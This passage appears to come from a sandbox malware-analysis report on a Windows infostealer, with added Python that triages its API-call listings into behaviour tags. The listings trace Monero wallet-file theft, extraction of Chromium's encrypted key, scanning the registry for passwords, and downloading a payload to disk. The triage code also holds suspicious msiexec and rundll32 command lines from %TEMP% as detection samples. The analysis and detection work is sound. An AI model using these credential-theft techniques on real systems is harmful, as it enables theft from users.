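     'C:\\Windows\\system32\\msiexec.exe /i "C:\\Users\\bob\\AppData\\Local\\Temp\\update.msi" /passive'),
    ("C:\\Windows\\System32\\rundll32.exe",
     'C:\\Windows\\system32\\rundll32.exe "C:\\Users\\bob\\AppData\\Local\\Temp\\helper.dll",Start'),
    ("C:\\Windows\\System32\\msiexec.exe",
     'msiexec.exe /i "C:\\Program Files\\Vendor\\setup.msi" /qn'),
    ("C:\\Windows\\System32\\rundll32.exe",
     "rundll32.exe C:\\Windows\\System32\\shell32.dll,Control_RunDLL"),
]

if __name__ == "__main__":
    for image, finding in triage(SAMPLE_EVENTS):
        print(image, "->", finding)
```

A passive msiexec install from %TEMP% is also what many legitimate installers produce, so treat a hit as a triage signal to be joined with the parent process (here the sample itself) and with the HTTP download that fetched the payload, rather than as a stand-alone verdict.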
                      APIs
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D6280: InternetOpenA.WININET(003F0DFE,00000001,00000000,00000000,00000000), ref: 003D62E1
                        • Part of subcall function 003D6280: StrCmpCA.SHLWAPI(?,0108E978), ref: 003D6303
                        • Part of subcall function 003D6280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 003D6335
                        • Part of subcall function 003D6280: HttpOpenRequestA.WININET(00000000,GET,?,0108E0E8,00000000,00000000,00400100,00000000), ref: 003D6385
                        • Part of subcall function 003D6280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 003D63BF
                        • Part of subcall function 003D6280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003D63D1
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003E5318
                      • lstrlen.KERNEL32(00000000), ref: 003E532F
                        • Part of subcall function 003E8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 003E8E52
                      • StrStrA.SHLWAPI(00000000,00000000), ref: 003E5364
                      • lstrlen.KERNEL32(00000000), ref: 003E5383
                      • lstrlen.KERNEL32(00000000), ref: 003E53AE
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                      • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                      • API String ID: 3240024479-1526165396
                      • Opcode ID: 215dc53b24ab246608fb4b1298cda5e8ec4469092899bc6c0e9a5fd3184977e3
                      • Instruction ID: 3c9173994ce21f7ccf90db39fd7369d217bd86ef4c6ee0afe18abd43d8ebc620
                      • Opcode Fuzzy Hash: 215dc53b24ab246608fb4b1298cda5e8ec4469092899bc6c0e9a5fd3184977e3
                      • Instruction Fuzzy Hash: 58513B30910698EBDB16EFA1D992BED377AAF10304F514228E4065E5D2EF347B05DB62
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcpylstrlen
                      • String ID:
                      • API String ID: 2001356338-0
                      • Opcode ID: 845ab76abf8abcabbbbeeca5a5f7ce55a79698227e40c223602bf36a8f04a750
                      • Instruction ID: 0f642967c1ba79667d88152fd10e6e957409be68fc10c5a5cd200999d5fe4854
                      • Opcode Fuzzy Hash: 845ab76abf8abcabbbbeeca5a5f7ce55a79698227e40c223602bf36a8f04a750
                      • Instruction Fuzzy Hash: 9BC1B7B5D0026C9BCB15EF61DC89FEA7779BF54304F004699F10A9B182DB70AA85CF91
                      APIs
                        • Part of subcall function 003E8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 003E8E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 003E42EC
                      • lstrcat.KERNEL32(?,0108E388), ref: 003E430B
                      • lstrcat.KERNEL32(?,?), ref: 003E431F
                      • lstrcat.KERNEL32(?,0108D0A8), ref: 003E4333
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003E8D90: GetFileAttributesA.KERNEL32(00000000,?,003D1B54,?,?,003F564C,?,?,003F0E1F), ref: 003E8D9F
                        • Part of subcall function 003D9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003D9D39
                        • Part of subcall function 003D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003D99EC
                        • Part of subcall function 003D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003D9A11
                        • Part of subcall function 003D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003D9A31
                        • Part of subcall function 003D99C0: ReadFile.KERNEL32(000000FF,?,00000000,003D148F,00000000), ref: 003D9A5A
                        • Part of subcall function 003D99C0: LocalFree.KERNEL32(003D148F), ref: 003D9A90
                        • Part of subcall function 003D99C0: CloseHandle.KERNEL32(000000FF), ref: 003D9A9A
                        • Part of subcall function 003E93C0: GlobalAlloc.KERNEL32(00000000,003E43DD,003E43DD), ref: 003E93D3
                      • StrStrA.SHLWAPI(?,0108E178), ref: 003E43F3
                      • GlobalFree.KERNEL32(?), ref: 003E4512
                        • Part of subcall function 003D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N=,00000000,00000000), ref: 003D9AEF
                        • Part of subcall function 003D9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,003D4EEE,00000000,?), ref: 003D9B01
                        • Part of subcall function 003D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N=,00000000,00000000), ref: 003D9B2A
                        • Part of subcall function 003D9AC0: LocalFree.KERNEL32(?,?,?,?,003D4EEE,00000000,?), ref: 003D9B3F
                      • lstrcat.KERNEL32(?,00000000), ref: 003E44A3
                      • StrCmpCA.SHLWAPI(?,003F08D1), ref: 003E44C0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 003E44D2
                      • lstrcat.KERNEL32(00000000,?), ref: 003E44E5
                      • lstrcat.KERNEL32(00000000,003F0FB8), ref: 003E44F4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                      • String ID:
                      • API String ID: 3541710228-0
                      • Opcode ID: b30d62466bc615d29ea7c93bb85b27ff61f7bbb3260ee048e6bc81953eeef3a6
                      • Instruction ID: c52b9048bb567bbff76809d4f5d45771607df9be0858c5b59e83186e92ed6cb5
                      • Opcode Fuzzy Hash: b30d62466bc615d29ea7c93bb85b27ff61f7bbb3260ee048e6bc81953eeef3a6
                      • Instruction Fuzzy Hash: 697146B6D00218ABDB15EBE1DC95FEE7379AB48300F048699F609971C1EA34EB45CF91
                      APIs
                        • Part of subcall function 003D12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003D12B4
                        • Part of subcall function 003D12A0: RtlAllocateHeap.NTDLL(00000000), ref: 003D12BB
                        • Part of subcall function 003D12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003D12D7
                        • Part of subcall function 003D12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003D12F5
                        • Part of subcall function 003D12A0: RegCloseKey.ADVAPI32(?), ref: 003D12FF
                      • lstrcat.KERNEL32(?,00000000), ref: 003D134F
                      • lstrlen.KERNEL32(?), ref: 003D135C
                      • lstrcat.KERNEL32(?,.keys), ref: 003D1377
                        • Part of subcall function 003EA740: lstrcpy.KERNEL32(003F0E17,00000000), ref: 003EA788
                        • Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003EA9C5
                        • Part of subcall function 003EA9B0: lstrcpy.KERNEL32(00000000), ref: 003EAA04
                        • Part of subcall function 003EA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 003EAA12
                        • Part of subcall function 003EA8A0: lstrcpy.KERNEL32(?,003F0E17), ref: 003EA905
                        • Part of subcall function 003E8B60: GetSystemTime.KERNEL32(003F0E1A,0108A3A0,003F05AE,?,?,003D13F9,?,0000001A,003F0E1A,00000000,?,010891A0,?,\Monero\wallet.keys,003F0E17), ref: 003E8B86
                        • Part of subcall function 003EA920: lstrcpy.KERNEL32(00000000,?), ref: 003EA972
                        • Part of subcall function 003EA920: lstrcat.KERNEL32(00000000), ref: 003EA982
                      • CopyFileA.KERNEL32(?,00000000,00000001), ref: 003D1465
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 003D99EC
                        • Part of subcall function 003D99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 003D9A11
                        • Part of subcall function 003D99C0: LocalAlloc.KERNEL32(00000040,?), ref: 003D9A31
                        • Part of subcall function 003D99C0: ReadFile.KERNEL32(000000FF,?,00000000,003D148F,00000000), ref: 003D9A5A
                        • Part of subcall function 003D99C0: LocalFree.KERNEL32(003D148F), ref: 003D9A90
                        • Part of subcall function 003D99C0: CloseHandle.KERNEL32(000000FF), ref: 003D9A9A
                      • DeleteFileA.KERNEL32(00000000), ref: 003D14EF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                      • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                      • API String ID: 3478931302-218353709
                      • Opcode ID: b3cd49206bcbeb529aabb6ea1208f1e338a298512fa5ad228e9ad93de9088247
                      • Instruction ID: 332a09b1476f6257220748b5bd5aa44f984ddf0e677816695092da0831946f4b
                      • Opcode Fuzzy Hash: b3cd49206bcbeb529aabb6ea1208f1e338a298512fa5ad228e9ad93de9088247
                      • Instruction Fuzzy Hash: D15178B1D1016857DB16FB61DC91FED737D9F50300F404299B20A660C2EF306B89CB96
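The Monero record above (registry lookup of wallet_path under SOFTWARE\monero-project\monero-core, ".keys" appended, CopyFileA, read, DeleteFileA), like the Local State and download records elsewhere in this listing, is API-call evidence that a triage script can turn into behaviour tags and IOC strings without re-running the sample. The Python below is an added example and not part of the Joe Sandbox report: it parses lines in the report's "APIs" format (copied verbatim from this listing as the constructed input), separates string literals from the 8-hex-digit placeholders, and applies a small rule table. The tag names and the rules are the example's own choices, not a Joe Sandbox signature set.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# Lines copied from the "APIs" listings in this report (three functions of the
# sample); they are the parser's constructed sample input.
MONERO_RECORD = """\
• Part of subcall function 003D12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 003D12D7
• Part of subcall function 003D12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 003D12F5
• lstrcat.KERNEL32(?,.keys), ref: 003D1377
• Part of subcall function 003EA9B0: lstrlen.KERNEL32(?,010891A0,?,\\Monero\\wallet.keys,003F0E17), ref: 003EA9C5
• CopyFileA.KERNEL32(?,00000000,00000001), ref: 003D1465
• Part of subcall function 003D99C0: ReadFile.KERNEL32(000000FF,?,00000000,003D148F,00000000), ref: 003D9A5A
• DeleteFileA.KERNEL32(00000000), ref: 003D14EF
"""
LOCAL_STATE_RECORD = """\
• Part of subcall function 003D9CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 003D9D39
• Part of subcall function 003D9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N=,00000000,00000000), ref: 003D9AEF
"""
DOWNLOAD_RECORD = """\
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 003D618F
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003D61B3
• InternetReadFile.WININET(?,?,00000400,?), ref: 003D61DC
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003D620A
"""

# One "APIs" line: optional bullet, optional "Part of subcall function <addr>:",
# API.MODULE, optional (args), then ", ref: <addr>" (CRT symbols have no parens).
LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
HEX_ARG = re.compile(r"^-?[0-9A-F]{8}$")  # unknown/pointer args print as 8 hex digits


@dataclass
class Call:
    api: str
    module: str
    args: List[str]
    ref: str                 # call-site address
    subcall: Optional[str]   # callee address when the line is "Part of subcall function"


def parse_record(text: str) -> List[Call]:
    calls: List[Call] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headers such as "APIs" or "Strings" carry no call
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw is not None else []
        calls.append(Call(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
    return calls


def literals(calls: List[Call]) -> List[str]:
    """String arguments in call order: anything that is neither a hex placeholder nor '?'."""
    out: List[str] = []
    for c in calls:
        for a in c.args:
            if a and a != "?" and not HEX_ARG.match(a) and a not in out:
                out.append(a)
    return out


# Rule table (this example's own naming): tag, APIs that must all appear,
# substrings that must each occur in at least one string literal.
RULES: List[Tuple[str, Set[str], Tuple[str, ...]]] = [
    ("download_to_disk", {"InternetOpenUrlA", "InternetReadFile", "CreateFileA", "WriteFile"}, ()),
    ("wallet_file_exfil_prep", {"CopyFileA", "ReadFile", "DeleteFileA"}, (".keys",)),
    ("registry_value_lookup", {"RegOpenKeyExA", "RegQueryValueExA"}, ()),
    ("chromium_local_state_key", {"StrStrA", "CryptStringToBinaryA"}, ('"encrypted_key":"',)),
    ("registry_password_scan", {"RegEnumValueA", "StrStrA"}, ("Password",)),
    ("ram_fingerprint", {"GlobalMemoryStatusEx", "wsprintfA"}, ("%d MB",)),
]


def classify(calls: List[Call]) -> List[str]:
    apis = {c.api for c in calls}
    lits = literals(calls)
    return [
        tag for tag, need_apis, need_lits in RULES
        if need_apis <= apis and all(any(n in lit for lit in lits) for n in need_lits)
    ]


def summarize(text: str) -> Dict[str, object]:
    """Per-function triage view: direct calls, calls reached via subcalls, IOC strings, tags."""
    calls = parse_record(text)
    return {
        "direct_apis": [c.api for c in calls if c.subcall is None],
        "subcall_apis": sorted({c.api for c in calls if c.subcall is not None}),
        "literals": literals(calls),
        "tags": classify(calls),
    }
```

summarize(MONERO_RECORD) yields the literals ".keys" and "\Monero\wallet.keys" with the tags wallet_file_exfil_prep and registry_value_lookup; the literal list doubles as the string set to hunt for in memory dumps of other samples of the family.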
                      APIs
                        • Part of subcall function 003D72D0: memset.MSVCRT ref: 003D7314
                        • Part of subcall function 003D72D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003D733A
                        • Part of subcall function 003D72D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003D73B1
                        • Part of subcall function 003D72D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003D740D
                        • Part of subcall function 003D72D0: GetProcessHeap.KERNEL32(00000000,?), ref: 003D7452
                        • Part of subcall function 003D72D0: HeapFree.KERNEL32(00000000), ref: 003D7459
                      • lstrcat.KERNEL32(00000000,003F17FC), ref: 003D7606
                      • lstrcat.KERNEL32(00000000,00000000), ref: 003D7648
                      • lstrcat.KERNEL32(00000000, : ), ref: 003D765A
                      • lstrcat.KERNEL32(00000000,00000000), ref: 003D768F
                      • lstrcat.KERNEL32(00000000,003F1804), ref: 003D76A0
                      • lstrcat.KERNEL32(00000000,00000000), ref: 003D76D3
                      • lstrcat.KERNEL32(00000000,003F1808), ref: 003D76ED
                      • task.LIBCPMTD ref: 003D76FB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                      • String ID: :
                      • API String ID: 3191641157-3653984579
                      • Opcode ID: 97fed061256770b872488eac567bb73c835449521dd9640e8dfddd466c9a4493
                      • Instruction ID: b61eed8ecccd24c59d83822efa968b7a26c5656e2ed10e1b3066cf2315c02a91
                      • Opcode Fuzzy Hash: 97fed061256770b872488eac567bb73c835449521dd9640e8dfddd466c9a4493
                      • Instruction Fuzzy Hash: 703143B6A01109DFCB46EBF4EC95DFF7779BB44301B14911AF102AB390EA34A946CB91
                      APIs
                      • memset.MSVCRT ref: 003D7314
                      • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 003D733A
                      • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 003D73B1
                      • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 003D740D
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 003D7452
                      • HeapFree.KERNEL32(00000000), ref: 003D7459
                      • task.LIBCPMTD ref: 003D7555
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap$EnumFreeOpenProcessValuememsettask
                      • String ID: Password
                      • API String ID: 2808661185-3434357891
                      • Opcode ID: 0ef21ac4340fe475e83a09cebd09834930fb4093f58331d34ecc7c0bca7d92e8
                      • Instruction ID: b9ee2bfabbf702b86e285e2b925778e72460c6cfd9bdd0f12631d26f21995a64
                      • Opcode Fuzzy Hash: 0ef21ac4340fe475e83a09cebd09834930fb4093f58331d34ecc7c0bca7d92e8
                      • Instruction Fuzzy Hash: A0613EB690416C9BDB26DF50DC45BD9B7B8BF44300F0081EAE649AA241EB706FC9CF91
                      APIs
                      • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0108DE78,00000000,?,003F0E2C,00000000,?,00000000), ref: 003E8130
                      • RtlAllocateHeap.NTDLL(00000000), ref: 003E8137
                      • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 003E8158
                      • __aulldiv.LIBCMT ref: 003E8172
                      • __aulldiv.LIBCMT ref: 003E8180
                      • wsprintfA.USER32 ref: 003E81AC
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072251141.00000000008C1000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072374070.0000000000A55000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2072391360.0000000000A56000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_3d0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                      • String ID: %d MB$@
                      • API String ID: 2774356765-3474575989
                      • Opcode ID: d621ab8a7f1857d8a872df0f465668caefc568c8318dd664c1b0bfc120e6cf57
                      • Instruction ID: 66f3508b08088f98e751089898fb73a8fa63c7717a4b83b489ff4ea8bf122830
                      • Opcode Fuzzy Hash: d621ab8a7f1857d8a872df0f465668caefc568c8318dd664c1b0bfc120e6cf57
                      • Instruction Fuzzy Hash: 2E211AB1E44258ABDB00DFD5DC49FAEB7B9FB44B10F104619F605BB2C0D77869018BA5
                      APIs
                        • Part of subcall function 003EA7A0: lstrcpy.KERNEL32(?,00000000), ref: 003EA7E6
                        • Part of subcall function 003D47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 003D4839
                        • Part of subcall function 003D47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 003D4849
                      • InternetOpenA.WININET(003F0DF7,00000001,00000000,00000000,00000000), ref: 003D610F
                      • StrCmpCA.SHLWAPI(?,0108E978), ref: 003D6147
                      • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 003D618F
                      • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 003D61B3
                      • InternetReadFile.WININET(?,?,00000400,?), ref: 003D61DC
                      • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 003D620A
                      • CloseHandle.KERNEL32(?,?,00000400), ref: 003D6249
                      • InternetCloseHandle.WININET(?), ref: 003D6253
                      • InternetCloseHandle.WININET(00000000), ref: 003D6260
                      Memory Dump Source
                      • Source File: 00000000.00000002.2071783009.00000000003D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                      • Associated: 00000000.00000002.2071761591.00000000003D0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.0000000000481000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000048D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.00000000004B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071783009.000000000061A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.000000000062E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000007AB000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.0000000000885000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008B2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.2071963040.00000000008C0000.00000040.00000001.01000000.00000003.sdmp
